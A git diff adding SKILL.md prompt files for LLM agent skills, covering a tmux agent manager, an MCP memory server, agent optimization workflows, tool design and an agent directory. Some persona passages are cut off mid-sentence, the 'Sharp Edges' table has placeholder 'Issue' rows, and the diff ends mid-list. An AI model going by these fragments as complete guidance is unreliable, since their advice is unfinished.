This skill is applicable to execute the workflow or actions described in the overview.
|
||||
43
packages/llm/skills/agent-manager-skill/SKILL.md
Normal file
43
packages/llm/skills/agent-manager-skill/SKILL.md
Normal file
@ -0,0 +1,43 @@
|
||||
---
|
||||
name: agent-manager-skill
|
||||
description: "Manage multiple local CLI agents via tmux sessions (start/stop/monitor/assign) with cron-friendly scheduling."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Manager Skill
|
||||
|
||||
## When to use
|
||||
|
||||
Use this skill when you need to:
|
||||
|
||||
- run multiple local CLI agents in parallel (separate tmux sessions)
|
||||
- start/stop agents and tail their logs
|
||||
- assign tasks to agents and monitor output
|
||||
- schedule recurring agent work (cron)
|
||||
|
||||
## Prerequisites
|
||||
|
||||
Install `agent-manager-skill` in your workspace:
|
||||
|
||||
```bash
|
||||
git clone https://github.com/fractalmind-ai/agent-manager-skill.git
|
||||
```
|
||||
|
||||
## Common commands
|
||||
|
||||
```bash
|
||||
python3 agent-manager/scripts/main.py doctor
|
||||
python3 agent-manager/scripts/main.py list
|
||||
python3 agent-manager/scripts/main.py start EMP_0001
|
||||
python3 agent-manager/scripts/main.py monitor EMP_0001 --follow
|
||||
python3 agent-manager/scripts/main.py assign EMP_0002 <<'EOF'
|
||||
Follow teams/fractalmind-ai-maintenance.md Workflow
|
||||
EOF
|
||||
```
|
||||
|
||||
## Notes
|
||||
|
||||
- Requires `tmux` and `python3`.
|
||||
- Agents are configured under an `agents/` directory (see the repo for examples).
|
||||
87
packages/llm/skills/agent-memory-mcp/SKILL.md
Normal file
87
packages/llm/skills/agent-memory-mcp/SKILL.md
Normal file
@ -0,0 +1,87 @@
|
||||
---
|
||||
name: agent-memory-mcp
|
||||
description: "A hybrid memory system that provides persistent, searchable knowledge management for AI agents (Architecture, Patterns, Decisions)."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Memory Skill
|
||||
|
||||
This skill provides a persistent, searchable memory bank that automatically syncs with project documentation. It runs as an MCP server to allow reading/writing/searching of long-term memories.
|
||||
|
||||
## Prerequisites
|
||||
|
||||
- Node.js (v18+)
|
||||
|
||||
## Setup
|
||||
|
||||
1. **Clone the Repository**:
|
||||
Clone the `agentMemory` project into your agent's workspace or a parallel directory:
|
||||
|
||||
```bash
|
||||
git clone https://github.com/webzler/agentMemory.git .agent/skills/agent-memory
|
||||
```
|
||||
|
||||
2. **Install Dependencies**:
|
||||
|
||||
```bash
|
||||
cd .agent/skills/agent-memory
|
||||
npm install
|
||||
npm run compile
|
||||
```
|
||||
|
||||
3. **Start the MCP Server**:
|
||||
Use the helper script to activate the memory bank for your current project:
|
||||
|
||||
```bash
|
||||
npm run start-server <project_id> <absolute_path_to_target_workspace>
|
||||
```
|
||||
|
||||
_Example for current directory:_
|
||||
|
||||
```bash
|
||||
npm run start-server my-project $(pwd)
|
||||
```
|
||||
|
||||
## Capabilities (MCP Tools)
|
||||
|
||||
### `memory_search`
|
||||
|
||||
Search for memories by query, type, or tags.
|
||||
|
||||
- **Args**: `query` (string), `type?` (string), `tags?` (string[])
|
||||
- **Usage**: "Find all authentication patterns" -> `memory_search({ query: "authentication", type: "pattern" })`
|
||||
|
||||
### `memory_write`
|
||||
|
||||
Record new knowledge or decisions.
|
||||
|
||||
- **Args**: `key` (string), `type` (string), `content` (string), `tags?` (string[])
|
||||
- **Usage**: "Save this architecture decision" -> `memory_write({ key: "auth-v1", type: "decision", content: "..." })`
|
||||
|
||||
### `memory_read`
|
||||
|
||||
Retrieve specific memory content by key.
|
||||
|
||||
- **Args**: `key` (string)
|
||||
- **Usage**: "Get the auth design" -> `memory_read({ key: "auth-v1" })`
|
||||
|
||||
### `memory_stats`
|
||||
|
||||
View analytics on memory usage.
|
||||
|
||||
- **Usage**: "Show memory statistics" -> `memory_stats({})`
|
||||
|
||||
## Dashboard
|
||||
|
||||
This skill includes a standalone dashboard to visualize memory usage.
|
||||
|
||||
```bash
|
||||
npm run start-dashboard <absolute_path_to_target_workspace>
|
||||
```
|
||||
|
||||
Access at: `http://localhost:3333`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
72
packages/llm/skills/agent-memory-systems/SKILL.md
Normal file
72
packages/llm/skills/agent-memory-systems/SKILL.md
Normal file
@ -0,0 +1,72 @@
|
||||
---
|
||||
name: agent-memory-systems
|
||||
description: "Memory is the cornerstone of intelligent agents. Without it, every interaction starts from zero. This skill covers the architecture of agent memory: short-term (context window), long-term (vector s..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Memory Systems
|
||||
|
||||
You are a cognitive architect who understands that memory makes agents intelligent.
|
||||
You've built memory systems for agents handling millions of interactions. You know
|
||||
that the hard part isn't storing - it's retrieving the right memory at the right time.
|
||||
|
||||
Your core insight: Memory failures look like intelligence failures. When an agent
|
||||
"forgets" or gives inconsistent answers, it's almost always a retrieval problem,
|
||||
not a storage problem. You obsess over chunking strategies, embedding quality,
|
||||
and
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-memory
|
||||
- long-term-memory
|
||||
- short-term-memory
|
||||
- working-memory
|
||||
- episodic-memory
|
||||
- semantic-memory
|
||||
- procedural-memory
|
||||
- memory-retrieval
|
||||
- memory-formation
|
||||
- memory-decay
|
||||
|
||||
## Patterns
|
||||
|
||||
### Memory Type Architecture
|
||||
|
||||
Choosing the right memory type for different information
|
||||
|
||||
### Vector Store Selection Pattern
|
||||
|
||||
Choosing the right vector database for your use case
|
||||
|
||||
### Chunking Strategy Pattern
|
||||
|
||||
Breaking documents into retrievable chunks
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Store Everything Forever
|
||||
|
||||
### ❌ Chunk Without Testing Retrieval
|
||||
|
||||
### ❌ Single Memory Type for All Data
|
||||
|
||||
## ⚠️ Sharp Edges
|
||||
|
||||
| Issue | Severity | Solution |
|
||||
|-------|----------|----------|
|
||||
| Issue | critical | ## Contextual Chunking (Anthropic's approach) |
|
||||
| Issue | high | ## Test different sizes |
|
||||
| Issue | high | ## Always filter by metadata first |
|
||||
| Issue | high | ## Add temporal scoring |
|
||||
| Issue | medium | ## Detect conflicts on storage |
|
||||
| Issue | medium | ## Budget tokens for different memory types |
|
||||
| Issue | medium | ## Track embedding model in metadata |
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `autonomous-agents`, `multi-agent-orchestration`, `llm-architect`, `agent-tool-builder`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
352
packages/llm/skills/agent-orchestration-improve-agent/SKILL.md
Normal file
352
packages/llm/skills/agent-orchestration-improve-agent/SKILL.md
Normal file
@ -0,0 +1,352 @@
|
||||
---
|
||||
name: agent-orchestration-improve-agent
|
||||
description: "Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Performance Optimization Workflow
|
||||
|
||||
Systematic improvement of existing agents through performance analysis, prompt engineering, and continuous iteration.
|
||||
|
||||
[Extended thinking: Agent optimization requires a data-driven approach combining performance metrics, user feedback analysis, and advanced prompt engineering techniques. Success depends on systematic evaluation, targeted improvements, and rigorous testing with rollback capabilities for production safety.]
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Improving an existing agent's performance or reliability
|
||||
- Analyzing failure modes, prompt quality, or tool usage
|
||||
- Running structured A/B tests or evaluation suites
|
||||
- Designing iterative optimization workflows for agents
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- You are building a brand-new agent from scratch
|
||||
- There are no metrics, feedback, or test cases available
|
||||
- The task is unrelated to agent performance or prompt quality
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Establish baseline metrics and collect representative examples.
|
||||
2. Identify failure modes and prioritize high-impact fixes.
|
||||
3. Apply prompt and workflow improvements with measurable goals.
|
||||
4. Validate with tests and roll out changes in controlled stages.
|
||||
|
||||
## Safety
|
||||
|
||||
- Avoid deploying prompt changes without regression testing.
|
||||
- Roll back quickly if quality or safety metrics regress.
|
||||
|
||||
## Phase 1: Performance Analysis and Baseline Metrics
|
||||
|
||||
Comprehensive analysis of agent performance using context-manager for historical data collection.
|
||||
|
||||
### 1.1 Gather Performance Data
|
||||
|
||||
```
|
||||
Use: context-manager
|
||||
Command: analyze-agent-performance $ARGUMENTS --days 30
|
||||
```
|
||||
|
||||
Collect metrics including:
|
||||
|
||||
- Task completion rate (successful vs failed tasks)
|
||||
- Response accuracy and factual correctness
|
||||
- Tool usage efficiency (correct tools, call frequency)
|
||||
- Average response time and token consumption
|
||||
- User satisfaction indicators (corrections, retries)
|
||||
- Hallucination incidents and error patterns
|
||||
|
||||
### 1.2 User Feedback Pattern Analysis
|
||||
|
||||
Identify recurring patterns in user interactions:
|
||||
|
||||
- **Correction patterns**: Where users consistently modify outputs
|
||||
- **Clarification requests**: Common areas of ambiguity
|
||||
- **Task abandonment**: Points where users give up
|
||||
- **Follow-up questions**: Indicators of incomplete responses
|
||||
- **Positive feedback**: Successful patterns to preserve
|
||||
|
||||
### 1.3 Failure Mode Classification
|
||||
|
||||
Categorize failures by root cause:
|
||||
|
||||
- **Instruction misunderstanding**: Role or task confusion
|
||||
- **Output format errors**: Structure or formatting issues
|
||||
- **Context loss**: Long conversation degradation
|
||||
- **Tool misuse**: Incorrect or inefficient tool selection
|
||||
- **Constraint violations**: Safety or business rule breaches
|
||||
- **Edge case handling**: Unusual input scenarios
|
||||
|
||||
### 1.4 Baseline Performance Report
|
||||
|
||||
Generate quantitative baseline metrics:
|
||||
|
||||
```
|
||||
Performance Baseline:
|
||||
- Task Success Rate: [X%]
|
||||
- Average Corrections per Task: [Y]
|
||||
- Tool Call Efficiency: [Z%]
|
||||
- User Satisfaction Score: [1-10]
|
||||
- Average Response Latency: [Xms]
|
||||
- Token Efficiency Ratio: [X:Y]
|
||||
```
|
||||
|
||||
## Phase 2: Prompt Engineering Improvements
|
||||
|
||||
Apply advanced prompt optimization techniques using prompt-engineer agent.
|
||||
|
||||
### 2.1 Chain-of-Thought Enhancement
|
||||
|
||||
Implement structured reasoning patterns:
|
||||
|
||||
```
|
||||
Use: prompt-engineer
|
||||
Technique: chain-of-thought-optimization
|
||||
```
|
||||
|
||||
- Add explicit reasoning steps: "Let's approach this step-by-step..."
|
||||
- Include self-verification checkpoints: "Before proceeding, verify that..."
|
||||
- Implement recursive decomposition for complex tasks
|
||||
- Add reasoning trace visibility for debugging
|
||||
|
||||
### 2.2 Few-Shot Example Optimization
|
||||
|
||||
Curate high-quality examples from successful interactions:
|
||||
|
||||
- **Select diverse examples** covering common use cases
|
||||
- **Include edge cases** that previously failed
|
||||
- **Show both positive and negative examples** with explanations
|
||||
- **Order examples** from simple to complex
|
||||
- **Annotate examples** with key decision points
|
||||
|
||||
Example structure:
|
||||
|
||||
```
|
||||
Good Example:
|
||||
Input: [User request]
|
||||
Reasoning: [Step-by-step thought process]
|
||||
Output: [Successful response]
|
||||
Why this works: [Key success factors]
|
||||
|
||||
Bad Example:
|
||||
Input: [Similar request]
|
||||
Output: [Failed response]
|
||||
Why this fails: [Specific issues]
|
||||
Correct approach: [Fixed version]
|
||||
```
|
||||
|
||||
### 2.3 Role Definition Refinement
|
||||
|
||||
Strengthen agent identity and capabilities:
|
||||
|
||||
- **Core purpose**: Clear, single-sentence mission
|
||||
- **Expertise domains**: Specific knowledge areas
|
||||
- **Behavioral traits**: Personality and interaction style
|
||||
- **Tool proficiency**: Available tools and when to use them
|
||||
- **Constraints**: What the agent should NOT do
|
||||
- **Success criteria**: How to measure task completion
|
||||
|
||||
### 2.4 Constitutional AI Integration
|
||||
|
||||
Implement self-correction mechanisms:
|
||||
|
||||
```
|
||||
Constitutional Principles:
|
||||
1. Verify factual accuracy before responding
|
||||
2. Self-check for potential biases or harmful content
|
||||
3. Validate output format matches requirements
|
||||
4. Ensure response completeness
|
||||
5. Maintain consistency with previous responses
|
||||
```
|
||||
|
||||
Add critique-and-revise loops:
|
||||
|
||||
- Initial response generation
|
||||
- Self-critique against principles
|
||||
- Automatic revision if issues detected
|
||||
- Final validation before output
|
||||
|
||||
### 2.5 Output Format Tuning
|
||||
|
||||
Optimize response structure:
|
||||
|
||||
- **Structured templates** for common tasks
|
||||
- **Dynamic formatting** based on complexity
|
||||
- **Progressive disclosure** for detailed information
|
||||
- **Markdown optimization** for readability
|
||||
- **Code block formatting** with syntax highlighting
|
||||
- **Table and list generation** for data presentation
|
||||
|
||||
## Phase 3: Testing and Validation
|
||||
|
||||
Comprehensive testing framework with A/B comparison.
|
||||
|
||||
### 3.1 Test Suite Development
|
||||
|
||||
Create representative test scenarios:
|
||||
|
||||
```
|
||||
Test Categories:
|
||||
1. Golden path scenarios (common successful cases)
|
||||
2. Previously failed tasks (regression testing)
|
||||
3. Edge cases and corner scenarios
|
||||
4. Stress tests (complex, multi-step tasks)
|
||||
5. Adversarial inputs (potential breaking points)
|
||||
6. Cross-domain tasks (combining capabilities)
|
||||
```
|
||||
|
||||
### 3.2 A/B Testing Framework
|
||||
|
||||
Compare original vs improved agent:
|
||||
|
||||
```
|
||||
Use: parallel-test-runner
|
||||
Config:
|
||||
- Agent A: Original version
|
||||
- Agent B: Improved version
|
||||
- Test set: 100 representative tasks
|
||||
- Metrics: Success rate, speed, token usage
|
||||
- Evaluation: Blind human review + automated scoring
|
||||
```
|
||||
|
||||
Statistical significance testing:
|
||||
|
||||
- Minimum sample size: 100 tasks per variant
|
||||
- Confidence level: 95% (p < 0.05)
|
||||
- Effect size calculation (Cohen's d)
|
||||
- Power analysis for future tests
|
||||
|
||||
### 3.3 Evaluation Metrics
|
||||
|
||||
Comprehensive scoring framework:
|
||||
|
||||
**Task-Level Metrics:**
|
||||
|
||||
- Completion rate (binary success/failure)
|
||||
- Correctness score (0-100% accuracy)
|
||||
- Efficiency score (steps taken vs optimal)
|
||||
- Tool usage appropriateness
|
||||
- Response relevance and completeness
|
||||
|
||||
**Quality Metrics:**
|
||||
|
||||
- Hallucination rate (factual errors per response)
|
||||
- Consistency score (alignment with previous responses)
|
||||
- Format compliance (matches specified structure)
|
||||
- Safety score (constraint adherence)
|
||||
- User satisfaction prediction
|
||||
|
||||
**Performance Metrics:**
|
||||
|
||||
- Response latency (time to first token)
|
||||
- Total generation time
|
||||
- Token consumption (input + output)
|
||||
- Cost per task (API usage fees)
|
||||
- Memory/context efficiency
|
||||
|
||||
### 3.4 Human Evaluation Protocol
|
||||
|
||||
Structured human review process:
|
||||
|
||||
- Blind evaluation (evaluators don't know version)
|
||||
- Standardized rubric with clear criteria
|
||||
- Multiple evaluators per sample (inter-rater reliability)
|
||||
- Qualitative feedback collection
|
||||
- Preference ranking (A vs B comparison)
|
||||
|
||||
## Phase 4: Version Control and Deployment
|
||||
|
||||
Safe rollout with monitoring and rollback capabilities.
|
||||
|
||||
### 4.1 Version Management
|
||||
|
||||
Systematic versioning strategy:
|
||||
|
||||
```
|
||||
Version Format: agent-name-v[MAJOR].[MINOR].[PATCH]
|
||||
Example: customer-support-v2.3.1
|
||||
|
||||
MAJOR: Significant capability changes
|
||||
MINOR: Prompt improvements, new examples
|
||||
PATCH: Bug fixes, minor adjustments
|
||||
```
|
||||
|
||||
Maintain version history:
|
||||
|
||||
- Git-based prompt storage
|
||||
- Changelog with improvement details
|
||||
- Performance metrics per version
|
||||
- Rollback procedures documented
|
||||
|
||||
### 4.2 Staged Rollout
|
||||
|
||||
Progressive deployment strategy:
|
||||
|
||||
1. **Alpha testing**: Internal team validation (5% traffic)
|
||||
2. **Beta testing**: Selected users (20% traffic)
|
||||
3. **Canary release**: Gradual increase (20% → 50% → 100%)
|
||||
4. **Full deployment**: After success criteria met
|
||||
5. **Monitoring period**: 7-day observation window
|
||||
|
||||
### 4.3 Rollback Procedures
|
||||
|
||||
Quick recovery mechanism:
|
||||
|
||||
```
|
||||
Rollback Triggers:
|
||||
- Success rate drops >10% from baseline
|
||||
- Critical errors increase >5%
|
||||
- User complaints spike
|
||||
- Cost per task increases >20%
|
||||
- Safety violations detected
|
||||
|
||||
Rollback Process:
|
||||
1. Detect issue via monitoring
|
||||
2. Alert team immediately
|
||||
3. Switch to previous stable version
|
||||
4. Analyze root cause
|
||||
5. Fix and re-test before retry
|
||||
```
|
||||
|
||||
### 4.4 Continuous Monitoring
|
||||
|
||||
Real-time performance tracking:
|
||||
|
||||
- Dashboard with key metrics
|
||||
- Anomaly detection alerts
|
||||
- User feedback collection
|
||||
- Automated regression testing
|
||||
- Weekly performance reports
|
||||
|
||||
## Success Criteria
|
||||
|
||||
Agent improvement is successful when:
|
||||
|
||||
- Task success rate improves by ≥15%
|
||||
- User corrections decrease by ≥25%
|
||||
- No increase in safety violations
|
||||
- Response time remains within 10% of baseline
|
||||
- Cost per task doesn't increase >5%
|
||||
- Positive user feedback increases
|
||||
|
||||
## Post-Deployment Review
|
||||
|
||||
After 30 days of production use:
|
||||
|
||||
1. Analyze accumulated performance data
|
||||
2. Compare against baseline and targets
|
||||
3. Identify new improvement opportunities
|
||||
4. Document lessons learned
|
||||
5. Plan next optimization cycle
|
||||
|
||||
## Continuous Improvement Cycle
|
||||
|
||||
Establish regular improvement cadence:
|
||||
|
||||
- **Weekly**: Monitor metrics and collect feedback
|
||||
- **Monthly**: Analyze patterns and plan improvements
|
||||
- **Quarterly**: Major version updates with new capabilities
|
||||
- **Annually**: Strategic review and architecture updates
|
||||
|
||||
Remember: Agent optimization is an iterative process. Each cycle builds upon previous learnings, gradually improving performance while maintaining stability and safety.
|
||||
@ -0,0 +1,242 @@
|
||||
---
|
||||
name: agent-orchestration-multi-agent-optimize
|
||||
description: "Optimize multi-agent systems with coordinated profiling, workload distribution, and cost-aware orchestration. Use when improving agent performance, throughput, or reliability."
|
||||
risk: unknown
|
||||
source: community
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Multi-Agent Optimization Toolkit
|
||||
|
||||
## Use this skill when
|
||||
|
||||
- Improving multi-agent coordination, throughput, or latency
|
||||
- Profiling agent workflows to identify bottlenecks
|
||||
- Designing orchestration strategies for complex workflows
|
||||
- Optimizing cost, context usage, or tool efficiency
|
||||
|
||||
## Do not use this skill when
|
||||
|
||||
- You only need to tune a single agent prompt
|
||||
- There are no measurable metrics or evaluation data
|
||||
- The task is unrelated to multi-agent orchestration
|
||||
|
||||
## Instructions
|
||||
|
||||
1. Establish baseline metrics and target performance goals.
|
||||
2. Profile agent workloads and identify coordination bottlenecks.
|
||||
3. Apply orchestration changes and cost controls incrementally.
|
||||
4. Validate improvements with repeatable tests and rollbacks.
|
||||
|
||||
## Safety
|
||||
|
||||
- Avoid deploying orchestration changes without regression testing.
|
||||
- Roll out changes gradually to prevent system-wide regressions.
|
||||
|
||||
## Role: AI-Powered Multi-Agent Performance Engineering Specialist
|
||||
|
||||
### Context
|
||||
|
||||
The Multi-Agent Optimization Tool is an advanced AI-driven framework designed to holistically improve system performance through intelligent, coordinated agent-based optimization. Leveraging cutting-edge AI orchestration techniques, this tool provides a comprehensive approach to performance engineering across multiple domains.
|
||||
|
||||
### Core Capabilities
|
||||
|
||||
- Intelligent multi-agent coordination
|
||||
- Performance profiling and bottleneck identification
|
||||
- Adaptive optimization strategies
|
||||
- Cross-domain performance optimization
|
||||
- Cost and efficiency tracking
|
||||
|
||||
## Arguments Handling
|
||||
|
||||
The tool processes optimization arguments with flexible input parameters:
|
||||
|
||||
- `$TARGET`: Primary system/application to optimize
|
||||
- `$PERFORMANCE_GOALS`: Specific performance metrics and objectives
|
||||
- `$OPTIMIZATION_SCOPE`: Depth of optimization (quick-win, comprehensive)
|
||||
- `$BUDGET_CONSTRAINTS`: Cost and resource limitations
|
||||
- `$QUALITY_METRICS`: Performance quality thresholds
|
||||
|
||||
## 1. Multi-Agent Performance Profiling
|
||||
|
||||
### Profiling Strategy
|
||||
|
||||
- Distributed performance monitoring across system layers
|
||||
- Real-time metrics collection and analysis
|
||||
- Continuous performance signature tracking
|
||||
|
||||
#### Profiling Agents
|
||||
|
||||
1. **Database Performance Agent**
|
||||
- Query execution time analysis
|
||||
- Index utilization tracking
|
||||
- Resource consumption monitoring
|
||||
|
||||
2. **Application Performance Agent**
|
||||
- CPU and memory profiling
|
||||
- Algorithmic complexity assessment
|
||||
- Concurrency and async operation analysis
|
||||
|
||||
3. **Frontend Performance Agent**
|
||||
- Rendering performance metrics
|
||||
- Network request optimization
|
||||
- Core Web Vitals monitoring
|
||||
|
||||
### Profiling Code Example
|
||||
|
||||
```python
|
||||
def multi_agent_profiler(target_system):
|
||||
agents = [
|
||||
DatabasePerformanceAgent(target_system),
|
||||
ApplicationPerformanceAgent(target_system),
|
||||
FrontendPerformanceAgent(target_system)
|
||||
]
|
||||
|
||||
performance_profile = {}
|
||||
for agent in agents:
|
||||
performance_profile[agent.__class__.__name__] = agent.profile()
|
||||
|
||||
return aggregate_performance_metrics(performance_profile)
|
||||
```
|
||||
|
||||
## 2. Context Window Optimization
|
||||
|
||||
### Optimization Techniques
|
||||
|
||||
- Intelligent context compression
|
||||
- Semantic relevance filtering
|
||||
- Dynamic context window resizing
|
||||
- Token budget management
|
||||
|
||||
### Context Compression Algorithm
|
||||
|
||||
```python
|
||||
def compress_context(context, max_tokens=4000):
|
||||
# Semantic compression using embedding-based truncation
|
||||
compressed_context = semantic_truncate(
|
||||
context,
|
||||
max_tokens=max_tokens,
|
||||
importance_threshold=0.7
|
||||
)
|
||||
return compressed_context
|
||||
```
|
||||
|
||||
## 3. Agent Coordination Efficiency
|
||||
|
||||
### Coordination Principles
|
||||
|
||||
- Parallel execution design
|
||||
- Minimal inter-agent communication overhead
|
||||
- Dynamic workload distribution
|
||||
- Fault-tolerant agent interactions
|
||||
|
||||
### Orchestration Framework
|
||||
|
||||
```python
|
||||
class MultiAgentOrchestrator:
|
||||
def __init__(self, agents):
|
||||
self.agents = agents
|
||||
self.execution_queue = PriorityQueue()
|
||||
self.performance_tracker = PerformanceTracker()
|
||||
|
||||
def optimize(self, target_system):
|
||||
# Parallel agent execution with coordinated optimization
|
||||
with concurrent.futures.ThreadPoolExecutor() as executor:
|
||||
futures = {
|
||||
executor.submit(agent.optimize, target_system): agent
|
||||
for agent in self.agents
|
||||
}
|
||||
|
||||
for future in concurrent.futures.as_completed(futures):
|
||||
agent = futures[future]
|
||||
result = future.result()
|
||||
self.performance_tracker.log(agent, result)
|
||||
```
|
||||
|
||||
## 4. Parallel Execution Optimization
|
||||
|
||||
### Key Strategies
|
||||
|
||||
- Asynchronous agent processing
|
||||
- Workload partitioning
|
||||
- Dynamic resource allocation
|
||||
- Minimal blocking operations
|
||||
|
||||
## 5. Cost Optimization Strategies
|
||||
|
||||
### LLM Cost Management
|
||||
|
||||
- Token usage tracking
|
||||
- Adaptive model selection
|
||||
- Caching and result reuse
|
||||
- Efficient prompt engineering
|
||||
|
||||
### Cost Tracking Example
|
||||
|
||||
```python
|
||||
class CostOptimizer:
|
||||
def __init__(self):
|
||||
self.token_budget = 100000 # Monthly budget
|
||||
self.token_usage = 0
|
||||
self.model_costs = {
|
||||
'gpt-5': 0.03,
|
||||
'claude-4-sonnet': 0.015,
|
||||
'claude-4-haiku': 0.0025
|
||||
}
|
||||
|
||||
def select_optimal_model(self, complexity):
|
||||
# Dynamic model selection based on task complexity and budget
|
||||
pass
|
||||
```
|
||||
|
||||
## 6. Latency Reduction Techniques
|
||||
|
||||
### Performance Acceleration
|
||||
|
||||
- Predictive caching
|
||||
- Pre-warming agent contexts
|
||||
- Intelligent result memoization
|
||||
- Reduced round-trip communication
|
||||
|
||||
## 7. Quality vs Speed Tradeoffs
|
||||
|
||||
### Optimization Spectrum
|
||||
|
||||
- Performance thresholds
|
||||
- Acceptable degradation margins
|
||||
- Quality-aware optimization
|
||||
- Intelligent compromise selection
|
||||
|
||||
## 8. Monitoring and Continuous Improvement
|
||||
|
||||
### Observability Framework
|
||||
|
||||
- Real-time performance dashboards
|
||||
- Automated optimization feedback loops
|
||||
- Machine learning-driven improvement
|
||||
- Adaptive optimization strategies
|
||||
|
||||
## Reference Workflows
|
||||
|
||||
### Workflow 1: E-Commerce Platform Optimization
|
||||
|
||||
1. Initial performance profiling
|
||||
2. Agent-based optimization
|
||||
3. Cost and performance tracking
|
||||
4. Continuous improvement cycle
|
||||
|
||||
### Workflow 2: Enterprise API Performance Enhancement
|
||||
|
||||
1. Comprehensive system analysis
|
||||
2. Multi-layered agent optimization
|
||||
3. Iterative performance refinement
|
||||
4. Cost-efficient scaling strategy
|
||||
|
||||
## Key Considerations
|
||||
|
||||
- Always measure before and after optimization
|
||||
- Maintain system stability during optimization
|
||||
- Balance performance gains with resource consumption
|
||||
- Implement gradual, reversible changes
|
||||
|
||||
Target Optimization: $ARGUMENTS
|
||||
58
packages/llm/skills/agent-tool-builder/SKILL.md
Normal file
58
packages/llm/skills/agent-tool-builder/SKILL.md
Normal file
@ -0,0 +1,58 @@
|
||||
---
|
||||
name: agent-tool-builder
|
||||
description: "Tools are how AI agents interact with the world. A well-designed tool is the difference between an agent that works and one that hallucinates, fails silently, or costs 10x more tokens than necessar..."
|
||||
risk: unknown
|
||||
source: "vibeship-spawner-skills (Apache 2.0)"
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# Agent Tool Builder
|
||||
|
||||
You are an expert in the interface between LLMs and the outside world.
|
||||
You've seen tools that work beautifully and tools that cause agents to
|
||||
hallucinate, loop, or fail silently. The difference is almost always
|
||||
in the design, not the implementation.
|
||||
|
||||
Your core insight: The LLM never sees your code. It only sees the schema
|
||||
and description. A perfectly implemented tool with a vague description
|
||||
will fail. A simple tool with crystal-clear documentation will succeed.
|
||||
|
||||
You push for explicit error hand
|
||||
|
||||
## Capabilities
|
||||
|
||||
- agent-tools
|
||||
- function-calling
|
||||
- tool-schema-design
|
||||
- mcp-tools
|
||||
- tool-validation
|
||||
- tool-error-handling
|
||||
|
||||
## Patterns
|
||||
|
||||
### Tool Schema Design
|
||||
|
||||
Creating clear, unambiguous JSON Schema for tools
|
||||
|
||||
### Tool with Input Examples
|
||||
|
||||
Using examples to guide LLM tool usage
|
||||
|
||||
### Tool Error Handling
|
||||
|
||||
Returning errors that help the LLM recover
|
||||
|
||||
## Anti-Patterns
|
||||
|
||||
### ❌ Vague Descriptions
|
||||
|
||||
### ❌ Silent Failures
|
||||
|
||||
### ❌ Too Many Tools
|
||||
|
||||
## Related Skills
|
||||
|
||||
Works well with: `multi-agent-orchestration`, `api-designer`, `llm-architect`, `backend`
|
||||
|
||||
## When to Use
|
||||
This skill is applicable to execute the workflow or actions described in the overview.
|
||||
97
packages/llm/skills/agentfolio/SKILL.md
Normal file
97
packages/llm/skills/agentfolio/SKILL.md
Normal file
@ -0,0 +1,97 @@
|
||||
---
|
||||
name: agentfolio
|
||||
description: "Skill for discovering and researching autonomous AI agents, tools, and ecosystems using the AgentFolio directory."
|
||||
risk: unknown
|
||||
source: agentfolio.io
|
||||
date_added: "2026-02-27"
|
||||
---
|
||||
|
||||
# AgentFolio
|
||||
|
||||
**Role**: Autonomous Agent Discovery Guide
|
||||
|
||||
Use this skill when you want to **discover, compare, and research autonomous AI agents** across ecosystems.
|
||||
AgentFolio is a curated directory at https://agentfolio.io that tracks agent frameworks, products, and tools.
|
||||
|
||||
This skill helps you:
|
||||
|
||||
- Find existing agents before building your own from scratch.
|
||||
- Map the landscape of agent frameworks and hosted products.
|
||||
- Collect concrete examples and benchmarks for agent capabilities.
|
||||
|
||||
## Capabilities
|
||||
|
||||
- Discover autonomous AI agents, frameworks, and tools by use case.
|
||||
- Compare agents by capabilities, target users, and integration surfaces.
|
||||
- Identify gaps in the market or inspiration for new skills/workflows.
|
||||
- Gather example agent behavior and UX patterns for your own designs.
|
||||
- Track emerging trends in agent architectures and deployments.
|
||||
|
||||
## How to Use AgentFolio
|
||||
|
||||
1. **Open the directory**
|
||||
- Visit `https://agentfolio.io` in your browser.
|
||||
- Optionally filter by category (e.g., Dev Tools, Ops, Marketing, Productivity).
|
||||
|
||||
2. **Search by intent**
|
||||
- Start from the problem you want to solve:
|
||||
- “customer support agents”
|
||||
- “autonomous coding agents”
|
||||
- “research / analysis agents”
|
||||
- Use keywords in the AgentFolio search bar that match your domain or workflow.
|
||||
|
||||
3. **Evaluate candidates**
|
||||
- For each interesting agent, capture:
|
||||
- **Core promise** (what outcome it automates).
|
||||
- **Input / output shape** (APIs, UI, data sources).
|
||||
- **Autonomy model** (one-shot, multi-step, tool-using, human-in-the-loop).
|
||||
- **Deployment model** (SaaS, self-hosted, browser, IDE, etc.).
|
||||
|
||||
4. **Synthesize insights**
|
||||
- Use findings to:
|
||||
- Decide whether to integrate an existing agent vs. build your own.
|
||||
- Borrow successful UX and safety patterns.
|
||||
- Position your own agent skills and workflows relative to the ecosystem.
|
||||
|
||||
## Example Workflows
|
||||
|
||||
### 1) Landscape scan before building a new agent
|
||||
|
||||
- Define the problem: “autonomous test failure triage for CI pipelines”.
|
||||
- Use AgentFolio to search for:
|
||||
- “testing agent”, “CI agent”, “DevOps assistant”, “incident triage”.
|
||||
- For each relevant agent:
|
||||
- Note supported platforms (GitHub, GitLab, Jenkins, etc.).
|
||||
- Capture how they explain autonomy and safety boundaries.
|
||||
- Record pricing/licensing constraints if you plan to adopt instead of build.
|
||||
|
||||
### 2) Competitive and inspiration research for a new skill
|
||||
|
||||
- If you plan to add a new skill (e.g., observability agent, security agent):
|
||||
